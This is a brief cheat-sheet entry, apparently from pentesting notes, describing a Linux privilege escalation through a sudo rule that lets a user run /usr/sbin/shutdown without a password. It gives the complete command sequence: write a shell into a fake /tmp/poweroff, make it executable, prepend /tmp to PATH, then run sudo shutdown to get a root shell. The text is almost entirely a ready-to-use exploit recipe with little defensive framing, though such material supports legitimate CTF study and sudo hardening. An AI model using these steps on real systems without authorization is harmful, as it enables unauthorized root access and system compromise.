Sudo Shutdown, Poweroff Privilege Escalation

Investigation

sudo -l

(ALL) NOPASS: /usr/sbin/shutdown

If we can execute "shutdown" command as root, we can gain access to privileges by overwriting the path of "poweroff".

First create /tmp/poweroff binary which invoke a shell.

echo /bin/sh > /tmp/poweroff
# or
echo /bin/bash > /tmp/poweroff

Then change permissions of the file and add "/tmp" folder to PATH.

chmod +x /tmp/poweroff
export PATH=/tmp:$PATH

Now execute "shutdown" as root.

# Some SUID command
sudo /usr/sbin/shutdown

# Then you are root user
root>

/tmp/poweroff is executed and spawn a root shell.